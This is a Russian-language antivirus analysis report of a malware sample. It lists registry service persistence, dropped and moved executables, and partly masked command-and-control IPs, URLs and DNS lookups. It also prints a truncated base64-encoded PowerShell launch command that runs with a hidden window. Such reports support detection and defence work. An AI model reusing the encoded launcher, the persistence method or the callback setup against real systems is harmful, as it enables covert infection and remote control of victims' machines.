Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\shaderangle] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\shaderangle] 'ImagePath' = '"%WINDIR%\SysWOW64\shaderangle.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\396.exe
Перемещает следующие файлы
- %HOMEPATH%\396.exe в %WINDIR%\syswow64\shaderangle.exe
Сетевая активность
Подключается к
- '18#.#31.163.89':7080
- '85.##4.121.33':8443
TCP
Запросы HTTP GET
- http://sa####iaschool.in/cgi-bin/y945hsn2u7-pdt9-5230/
Запросы HTTP POST
- http://85.###.121.33:8443/psec/sess/ringin/merge/
UDP
- DNS ASK s-####rov-mektep.kz
- DNS ASK vi####mfumar.club
- DNS ASK sa####iaschool.in
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\396.exe'
- '%WINDIR%\syswow64\shaderangle.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...' (со скрытым окном)
